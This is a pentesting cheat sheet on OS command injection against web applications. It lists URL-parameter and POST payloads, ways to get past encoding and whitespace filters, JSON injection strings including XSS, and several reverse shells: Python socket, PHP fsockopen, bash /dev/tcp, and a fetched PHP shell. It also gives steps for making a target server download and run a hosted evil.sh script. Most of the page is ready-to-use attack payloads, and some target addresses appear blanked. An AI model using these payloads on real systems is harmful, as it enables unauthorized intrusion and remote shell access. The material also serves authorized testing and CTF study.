OS Command Injection

Last modified: 2023-11-11

Remote Code Execution Reverse Shell Web

Basic Payloads

If the payload includes whitespaces (' '), we need to change it to '+' or URL encoding ('%20').



/?cmd=ls ..
/?cmd=ls ../
/?cmd=ls /home

/?cmd=`ping -c 1`

/?file=example.txt; echo $(ls -al /)
/?file=example.txt; echo $(ls -al /) |

<!-- PHP query string -->


<!-- Windows -->
/?file=example.txt | systeminfo #
/?file=example.txt ; systeminfo #
/?file=example.txt') ; systeminfo #

URL Encoding

We may be able to bypass specific character filter by encoding them.

# %0A: newline
# %250A: newline (double encoding)

# %26: &
# %2526: & (double encoding)
# &&

# %3B: ;
# %253B: ; (double encoding)

Bypass Whitespace Filter

Reference: https://www.ctfnote.com/web/os-command-injection/whitespace-bypass

If the website filters whitespaces and we cannot inject OS command including spaces e.g. 'sleep 5', we can insert Internal Field Separator (IFS) as whitespace.


Payload Examples:

<!-- ping -c 5 -->


Try pinging to our local machine for checking if our command injection achieves.
To confirm the result, start tcpdump in our local machine.

# -i: Interface e.g. eth0, tun0
sudo tcpdump -i eth0 icmp

Then execute ping command in POST request.

Below are examples for POST data.


Reverse Shell

file=example.jpg&filetype=png;export RHOST="";export RPORT=4444;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

PHP Reverse Shell

Reference: https://book.hacktricks.xyz/pentesting-web/command-injection#examples

# 1. Download PHP payload
wget https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php -O shell.php

# 2. Edit `ip` and `port` values.
vim shell.php

# 3. Send payload & get shell (run `nc -lvnp <port>` in another terminal before doing this)

Blind Command Injection (Time Delay)

Use "ping" command to check if the website will be loaded with time delay.


If we find the command can be executed, we can execute the other commands as below.


JSON Injection

{ "username": "\"; pwd \"" }
{"email": "\";ping -c 1\""}

{"name":"<script>alert(1)</script>", "email":"victim@vulnerable.com"}

{"name": "admin", "content": "{{template: ./admin.php}}"}

PHP Injection

id=$(php -r '$sock=fsockopen("",4444);exec("/bin/sh -i <&3 >&3 2>&3");')

# URL encode

Indirect Payloads with Shell Script

If we cannot inject command directly as above, try injecting from files.

Create a shell script. The filename here is evil.sh`.

bash -c 'bash -i >& /dev/tcp/ 0>&1'

Host this file by starting web server in the directory where the evil.sh exists.

sudo python3 -m http.server 80

In target website, inject command to let target server download the shell script and execute it. Before that, we need to start listerner by nc -lvnp 4444 in another terminal in local machine. Here is the example.


We might get a shell.